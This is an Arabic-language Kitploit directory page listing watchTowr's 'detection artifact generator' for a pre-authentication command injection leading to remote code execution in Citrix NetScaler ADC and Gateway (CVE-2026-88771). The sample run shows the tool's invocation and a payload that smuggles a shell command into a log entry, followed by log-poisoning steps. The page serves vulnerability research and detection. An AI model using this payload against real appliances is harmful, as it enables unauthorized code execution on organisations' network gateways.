Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
watchTowr-vs-Citrix-Netscaler-CVE-2026-88771 — أداة توليد أدلة الكشف لثغرة Citrix NetScaler CVE-2026-88771، والتي تستغل حقن أوامر قبل المصادقة لتحقيق تنفيذ التعليمات البرمجية عن بُعد ضد عمليات نشر ADC وGateway. | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-citrix-netscaler-cve-2026-88771
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالفريق الأحمرأداة الوصول عن بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
GitHub
watchtowrlabs/watchtowr-vs-citrix-netscaler-cve-2026-88771

watchTowr-vs-Citrix-Netscaler-CVE-2026-88771

أداة توليد أدلة الكشف لثغرة Citrix NetScaler CVE-2026-88771، والتي تستغل حقن أوامر قبل المصادقة لتحقيق تنفيذ التعليمات البرمجية عن بُعد ضد عمليات نشر ADC وGateway.

عرض المستودع
1953منذ 2 أياملم تتم المراجعة بعد
مشاركة

watchTowr-vs-Citrix-Netscaler-CVE-2026-88771

مولّد أدلة الكشف لـ Citrix NetScaler CVE-2026-88771

راجع منشور المدونة الخاص بنا للحصول على التفاصيل التقنية.

الكشف أثناء العمل

./watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py --target https://netscaler.local/ --command 'id>/var/tmp/watchTowr'
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py

        (*) Citrix NetScaler PreAuth Command Injection to RCE Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-88771]

[+] connected to https://netscaler.local/
[*] payload built: pitboss PPE unexpectedly died NSPPE;id>/var/tmp/watchTowr;# X
[+] poisoning the logs...
[*] triggering force pickup...
[*] remote force pickup in progress
[*] done

قد يستغرق الأمر حتى 24 ساعة حتى يتم التقاط الأمر كما أن تقنية الالتقاط القسري (force pickup) غير مُضمّنة

الإصدارات المتأثرة

جميع عمليات نشر NetScaler ADC و NetScaler Gateway (الإعداد الافتراضي / لا حاجة إلى ميزة إضافية)

راجع الإشعار الرسمي من Citrix للحصول على قائمة الإصدارات المتأثرة.

تابع watchTowr Labs

للحصول على أحدث الأبحاث الأمنية تابع فريق watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة